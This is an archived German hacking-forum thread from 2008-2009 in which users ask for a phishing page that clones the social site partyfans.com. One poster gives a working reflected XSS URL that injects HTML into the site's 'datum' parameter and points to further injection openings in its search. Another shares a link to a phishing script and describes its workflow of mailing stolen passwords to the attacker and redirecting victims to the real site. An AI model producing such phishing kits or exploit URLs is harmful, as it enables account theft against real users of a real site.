Archiv verlassen und diese Seite im Standarddesign anzeigen : [s] Partyfans.com Phishing Seite
bauernsk1ll
14.12.2008, 19:47
Hi,
ich habe jetzt schon 2 phishing vtuts durchgearbeitet leider erfolglos.
Bei anderen Seiten klappts ganz gut, aber bei partyfans.com komm ich immer ins stocken...
Könnte mir evtl jemand phishingseite für partyfans.com machen, wenn derjenige dann noch lust hat kann er mir ja die Tücke bei dieser Seite näher bringen.
soweit von mir
mfg
Mit ein paar HTML Kenntnissen & Anfängerwissen in PHP solltest du das auch alleins hinbekommen :)
Also lieber dafür Tutorials suchen anstatt für Phishing-Seiten... ;)
Da ich selbst auf dieser Seite gereggt bin & vor ca 2 Jahren auch schonmal nach Lücken gesucht habe, kann ich dir verraten, dass es mal eine XSS Lücke in der Suchfunktion gab - Leider seit ein paar Monaten gefixxt... =/ bin mir aber sicher, dass man - wenn man sich ein bisschen umschaut sicherlich noch mehr findet, da die Seite komplett selbst Programmiert wurde... und wie wir alle wissen - keiner ist fehlerfrei :)
[mit soetwas hätte man meiner Meinung nach mehr Erfolg als mit Phishing...]
bauernsk1ll
14.12.2008, 21:57
Von so einer Lücke hab ich schon gehört, leider habe ich von sowas nur minimal Ahnung :(
Hack_Eddie
17.12.2008, 11:28
Ich bräuchtee auch eine Partyfans.com pishing Seite,
Kann einer machen pls?
Sind doch immer noch XSS Lücken ;) Beispielsweise im GET-Parameter datum hier:
http://www.partyfans.com/index.php?dest=3400&datum=2009-05"><h1>Wer mir Sql-i beibringen möchte ... ICQ: 482226845</h1>&Submit=anzeigen
Ich bräuchtee auch eine Partyfans.com pishing Seite,
Kann einer machen pls?
Hi,
ich habe jetzt schon 2 phishing vtuts durchgearbeitet leider erfolglos.
Bei anderen Seiten klappts ganz gut, aber bei partyfans.com komm ich immer ins stocken...
Könnte mir evtl jemand phishingseite für partyfans.com machen, wenn derjenige dann noch lust hat kann er mir ja die Tücke bei dieser Seite näher bringen.
soweit von mir
mfg
Wenn ich am WE ein bisschen Zeit finde mach ich mal eine.. ;)
@Trick0r:
Jep... ist auch nicht die Einzigste die man dort noch findet^^
Man muss alleins in der suche mal --> eingeben und bekommt schon 'ne Order by angezeigt.. :) (die man aber leider nicht injecten kann, bzw. habe mich noch nicht allzuarg damit auseinander gesetzt..)
PS. wie kommt es dass sich so viele von Partyfans hier rumtreiben und solche anfragen stellen... :shock:
bauernsk1ll
17.12.2008, 20:21
:) kA
Wie versprochen, hier mal das Phishing-Script:
http://uploaded.to/?id=a2coqi
Anmerkung:
- Euer Webspace auf den ihr es ladet muss PHP unterstützen und Mails versenden können.
- In die userLogin.php die Mailadresse eintragen, an welche das PWD geschickt werden soll.
--
Kurze Beschreibung:
1: User besucht Eure Seite & gibt Daten ein.
2: Die Daten werden an Eure Mailadresse geschickt.
3: Der User wird auf die original Partyfansseite umgeleitet und bekommt eine Nachricht, dass er das falsche Passwort eingegeben hat.
bauernsk1ll
22.12.2008, 22:44
super vielen dank!
edit: mein webspace wird andauernd gesperrt welchen empfehlt ihr? mit php+mail senden
Könntest du´s villeicht nochmal hochladen? Wär echt toll. Der link funtzt nämlich nett ;-)
Digifree
28.04.2009, 08:07
Link ist Down bitte nen Reupp will mir das mal anschauen. Danke
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.